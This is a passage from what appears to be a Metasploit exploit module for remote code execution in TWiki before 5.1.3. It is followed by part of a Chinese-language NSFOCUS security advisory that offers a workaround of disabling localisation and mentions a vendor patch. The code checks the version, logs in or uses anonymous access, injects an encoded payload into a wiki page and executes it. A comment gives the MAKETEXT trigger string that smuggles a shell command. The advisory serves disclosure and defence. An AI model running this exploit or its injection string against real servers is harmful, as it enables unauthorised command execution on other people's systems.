if not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/
print_warning("Error injecting the payload")
print_status "#{res.code}\n#{res.body}\n#{res.headers['Location']}"
return nil
end
location = URI(res.headers['Location']).path
print_good("Payload injected on #{location}")
return location
end
def check
@base = target_uri.path
@base << '/' if @base[-1, 1] != '/'
res = send_request_cgi({
'uri' => "#{@base}do/view/TWiki/WebHome"
})
if not res or res.code != 200
return Exploit::CheckCode::Unknown
end
if res.body =~ /This site is running TWiki version.*TWiki-(\d\.\d\.\d)/
version = $1
print_status("Version found: #{version}")
if version < "5.1.3"
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
return Exploit::CheckCode::Detected
end
def exploit
# Init variables
@page = ''
if datastore['TwikiPage'] and not datastore['TwikiPage'].empty?
@page << '/' if datastore['TwikiPage'][0] != '/'
@page << datastore['TwikiPage']
else
@page << "/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}"
end
@base = target_uri.path
@base << '/' if @base[-1, 1] != '/'
# Login if needed
if (datastore['USERNAME'] and
not datastore['USERNAME'].empty? and
datastore['PASSWORD'] and
not datastore['PASSWORD'].empty?)
print_status("Trying login to get session ID...")
session = do_login(datastore['USERNAME'], datastore['PASSWORD'])
else
print_status("Using anonymous access...")
session = ""
end
if not session
fail_with(Exploit::Failure::Unknown, "Error getting a session ID")
end
# Inject payload
print_status("Trying to inject the payload on #{@page}...")
res = inject_code(session, payload.encoded)
if not res
fail_with(Exploit::Failure::Unknown, "Error injecting the payload")
end
# Execute payload
print_status("Executing the payload through #{res}...")
res = send_request_cgi({
'uri' => res,
'cookie' => "TWIKISID=#{session}"
})
if not res or res.code != 200 or res.body !~ /HASH/
fail_with(Exploit::Failure::Unknown, "Error executing the payload")
end
print_good("Exploitation was successful")
end
end
=begin
* Trigger:
%MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}%
=end
建议:
--------------------------------------------------------------------------------
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 通过将flag {UserInterfaceInternationalisation} 设置为0禁用本地化操作。
厂商补丁:
TWiki
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: